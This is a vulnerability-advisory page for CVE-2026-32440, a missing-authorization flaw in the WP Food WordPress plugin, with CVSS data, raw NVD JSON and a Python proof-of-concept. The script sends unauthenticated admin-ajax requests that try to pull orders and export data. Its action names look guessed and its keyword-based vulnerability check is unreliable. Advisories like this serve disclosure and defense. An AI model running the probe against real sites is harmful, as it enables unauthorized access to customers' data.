Security Vulnerability Report
中文
CVE-2026-32440 CVSS 5.3 MEDIUM

CVE-2026-32440

Published: 2026-03-13 19:55:04
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Ex-Themes WP Food wp-food allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Food: from n/a through < 2.7.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Food < 2.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32440 WP Food Plugin Authorization Bypass PoC # This PoC demonstrates the missing authorization vulnerability in WP Food < 2.7.1 import requests import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_PATH = "/wp-content/plugins/wp-food/" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32440 """ # Common WP Food AJAX endpoints that may be accessible without authorization endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}{PLUGIN_PATH}includes/api.php", ] # Test unauthenticated access to admin functions test_payloads = [ { "action": "wp_food_get_orders", "params": {"limit": 10} }, { "action": "wp_food_get_menu_items", "params": {"category_id": 1} }, { "action": "wp_food_admin_action", "params": {"subaction": "export_data"} } ] print("[*] Testing for CVE-2026-32440 - Missing Authorization in WP Food") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: for payload in test_payloads: try: data = {"action": payload["action"]} data.update(payload["params"]) response = requests.post(endpoint, data=data, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for sensitive data in response if any(keyword in response.text.lower() for keyword in ["order", "user", "email", "password", "admin"]): print(f"[!] VULNERABLE: {endpoint} with action {payload['action']}") print(f"[!] Response contains potentially sensitive data") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[*] No obvious vulnerability detected") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32440", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:04.473", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ex-Themes WP Food wp-food allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Food: from n/a through < 2.7.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ex-Themes WP Food wp-food permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Food: desde n/a hasta &lt; 2.7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-food/vulnerability/wordpress-wp-food-plugin-2-7-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}